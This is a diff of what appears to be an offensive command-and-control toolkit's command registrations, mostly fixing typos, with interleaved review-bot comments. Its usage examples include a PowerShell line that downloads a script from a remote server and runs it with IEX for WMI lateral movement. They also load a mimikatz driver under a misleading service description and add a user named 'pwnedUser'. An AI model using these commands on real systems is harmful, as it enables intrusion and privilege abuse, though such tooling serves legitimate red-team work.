diff --git a/InvokeAssembly/invokeassembly.py b/InvokeAssembly/invokeassembly.py
index d4f143e..c22a539 100644
--- a/InvokeAssembly/invokeassembly.py
+++ b/InvokeAssembly/invokeassembly.py
@@ -37,4 +37,4 @@ def InvokeAssembly( demonID, *param ):
 return TaskID
-RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
+RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a separate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
diff --git a/Jump-exec/WMI/wmi.py b/Jump-exec/WMI/wmi.py
index 8e3e970..440db0e 100644
--- a/Jump-exec/WMI/wmi.py
+++ b/Jump-exec/WMI/wmi.py
@@ -113,5 +113,5 @@ def wmi_proccreate( demonID, *params ):
 return TaskID
 RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" )
-RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path ", "10.10.10.10 /tmp/demon.vba" )
-RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command ", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
+RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path ", "10.10.10.10 /tmp/demon.vba" )
+RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command ", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
diff --git a/RemoteOps/RemoteOps.py b/RemoteOps/RemoteOps.py
index 55085f5..6468193 100644
--- a/RemoteOps/RemoteOps.py
+++ b/RemoteOps/RemoteOps.py
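Review bot: The usage string on the changed `RegisterCommand( InvokeAssembly, ...` line still contains the typo `assembl.exe` in `"[/path/to/assembl.exe] (args)"`, so the commit corrects one spelling error in that call and leaves the neighbouring one; it should read `"[/path/to/assembly.exe] (args)"`. In the Jump-exec hunk on the same line the removed and added `RegisterCommand` lines are textually identical as shown here, which suggests a whitespace or line-ending-only change that the commit does not explain — worth confirming that is intended rather than an accidental re-save.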
@@ -619,7 +619,7 @@ def adduser( demonID, *params ):
 return TaskID
-RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windwos\\temp\\test.txt" )
+RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windows\\temp\\test.txt" )
 RegisterCommand( addusertogroup, "", "addusertogroup", "Add the specified user to the specified group", 0, """
 USERNAME Required. The user name to activate/enable. GROUPNAME Required. The group to add the user to.
@@ -640,7 +640,7 @@ def adduser( demonID, *params ):
 the domain name for the user if it is a domain account, or use \"\" to target an account on the local machine.""", "pwnedUser Password123! computer132 \"\"" )
 RegisterCommand( reg_delete, "", "reg_delete", "Deletes the registry key or value", 0, """
- HOSTNAME Optional. The host to connect to and run the commnad on.
+ HOSTNAME Optional. The host to connect to and run the command on.
 HIVE Required. The registry hive containing the REGPATH. Possible values: HKLM
@@ -662,7 +662,7 @@ def adduser( demonID, *params ):
 FILEOUT Required. The output file. Note: The FILEOUT is saved to disk on target, so don't forget to clean up.""", "HKLM Some\\Path c:\\windows\\temp\\reg.txt" )
 RegisterCommand( reg_set, "", "reg_set", "This command creates or sets the specified registry key (or value) on the target host.", 0, """
- HOSTNAME Optional. The host to connect to and run the commnad on.
+ HOSTNAME Optional. The host to connect to and run the command on.
 HIVE Required. The registry hive containing the REGPATH. Possible values: HKLM
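Review bot: In the `-619` hunk the example argument of the changed `adcs_request` registration, `"1337 c:\\windows\\temp\\test.txt"`, does not match the usage string `/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] ...` on the same line; it looks like a process-id-plus-path example carried over from a different command, and the commit only corrects its spelling. The example should use the documented switch form, e.g. `"/CA:<ca-name> /TEMPLATE:<template>"` (placeholders to be filled with a realistic sample). The `-640` and `-662` hunks ending on this line are spelling-only and need nothing further.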
@@ -707,7 +707,7 @@ def adduser( demonID, *params ):
 2 - SERVICE_KERNEL_DRIVER (Driver service)
 3 - SERVICE_WIN32_OWN_PROCESS (Service that runs in its own process) <-- Default
 4 - SERVICE_WIN32_SHARE_PROCESS (Service that shares a process with one or more other services)
- HOSTNAME Optional. The host to connect to and run the commnad on. The
+ HOSTNAME Optional. The host to connect to and run the command on. The
 local system is targeted if a HOSTNAME is not specified.""", "mimidrv mimidrv C:\\Windows\\Temp\\mimidrv.sys \"\" 0 3 2" )
 RegisterCommand( sc_start, "", "sc_start", "This command starts the specified service on the target host.", 0, """
 SVCNAME Required. The name of the service to start.
@@ -715,16 +715,16 @@ def adduser( demonID, *params ):
 local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
 RegisterCommand( sc_stop, "", "sc_stop", "This command stops the specified service on the target host.", 0, """
 SVCNAME Required. The name of the service to stop.
- HOSTNAME Optional. The host to connect to and run the commnad on. The
+ HOSTNAME Optional. The host to connect to and run the command on. The
 local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
 RegisterCommand( sc_delete, "", "sc_delete", "This command deletes the specified service on the target host.", 0, """
 SVCNAME Required. The name of the service to delete.
- HOSTNAME Optional. The host to connect to and run the commnad on. The
+ HOSTNAME Optional. The host to connect to and run the command on. The
 local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
 RegisterCommand( sc_description, "", "sc_description", "This command sets the description of an existing service on the target host.", 0, """
 SVCNAME Required. The name of the service to create.
 DESCRIPTION Required. The description of the service.
- HOSTNAME Optional. The host to connect to and run the commnad on. The
+ HOSTNAME Optional. The host to connect to and run the command on. The
 local system is targeted if a HOSTNAME is not specified.""", "mimidrv \"definitely not a mimikatz kernel driver\"" )
 RegisterCommand( adduser, "", "adduser", "Add a new user to a machine.", 0, """
 USERNAME Required. The name of the new user.
diff --git a/SituationalAwareness/SituationalAwareness.py b/SituationalAwareness/SituationalAwareness.py
index 37f5e1c..a5225c9 100644
--- a/SituationalAwareness/SituationalAwareness.py
+++ b/SituationalAwareness/SituationalAwareness.py
@@ -1468,7 +1468,7 @@ def sa_tasklist( demonID, *params ):
 RegisterCommand( schtasksenum, "", "schtasksenum", "Enumerate scheduled tasks on the local or remote computer", 0, "[opt: server]", "" )
 RegisterCommand( schtasksquery, "", "schtasksquery", "Query the given task on the local or remote computer", 0, "[opt: server] [taskpath]", "" )
 RegisterCommand( sc_enum, "", "sc_enum", "Enumerate services for qc, query, qfailure, and qtriggers info", 0, "[opt: server]", "" )
-RegisterCommand( sc_qc, "", "sc_qc", "sc qc impelmentation in BOF", 0, "service_name [opt:server]", "SensorService" )
+RegisterCommand( sc_qc, "", "sc_qc", "sc qc implementation in BOF", 0, "service_name [opt:server]", "SensorService" )
 RegisterCommand( sc_query, "", "sc_query", "sc query implementation in BOF", 0, "[opt: service name] [opt: server]", "" )
 RegisterCommand( sc_qdescription, "", "sc_qdescription", "Queries a services description", 0, "service_name [opt: server]", "SensorService" )
 RegisterCommand( sc_qfailure, "", "sc_qfailure", "Query a service for failure conditions", 0, "service_name [opt: server]", "SensorService" )
@@ -1476,7 +1476,7 @@ def sa_tasklist( demonID, *params ):
 RegisterCommand( adcs_enum, "", "adcs_enum", "Enumerate CAs and templates in the AD using Win32 functions", 0, "[opt: domain]", "" )
 RegisterCommand( enumlocalsessions, "", "enumlocalsessions", "Enumerate currently attached user sessions both local and over RDP", 0, "", "" )
 RegisterCommand( enum_filter_driver, "", "enum_filter_driver", "Enumerate filter drivers", 0, "[opt: system]", "" )
-RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distingished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
+RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distinguished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
 RegisterCommand( netsession, "", "get-netsession", "Enumerate sessions on the local or specified computer", 0, "[opt:computer]", "" )
 RegisterCommand( netGroupList, "", "netGroupList", "List groups from the default or specified domain", 0, "[opt: domain]", "" )
 RegisterCommand( netGroupListMembers, "", "netGroupListMembers", "List group members from the default or specified domain", 0, "groupname [opt: domain]", "" )
@@ -1490,6 +1490,6 @@ def sa_tasklist( demonID, *params ):
 RegisterCommand( netsharesAdmin, "", "netsharesAdmin", "List shares on local or remote computer and gets more info then standard netshares (requires admin)", 0, "[opt: \\\\computername]", "" )
 RegisterCommand( netuptime, "", "netuptime", "Returns information about the boot time on the local (or a remote) machine", 0, "[opt: hostname]", "" )
 RegisterCommand( netview, "", "netview", "lists local workstations and servers", 0, "[opt: netbios_domain_name]", "" )
-RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe usingt the Windows API", 0, "", "10.10.10.10" )
+RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe using the Windows API", 0, "", "10.10.10.10" )
 #RegisterCommand( bofdir, "", "bofdir", "Lists a target directory using BOF.", 0, "[directory] [/s]", "C:\\Windows\\Temp" )
 RegisterCommand( sa_tasklist, "", "tasklist", "This command displays a list of currently running processes on either a local or remote machine.", 0, "[hostname]", "" )
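Review bot: The changed `quser` registration declares an empty usage string `""` but gives `"10.10.10.10"` as its example, which leaves a reader unsure whether a host argument is accepted at all. If quser takes an optional host (the example suggests so, but the handler's argument parsing is not in this hunk), the usage should document it, e.g. `"[opt: hostname]"` in the style of the `netuptime` line two above; otherwise the example should be reduced to `""` to match the usage.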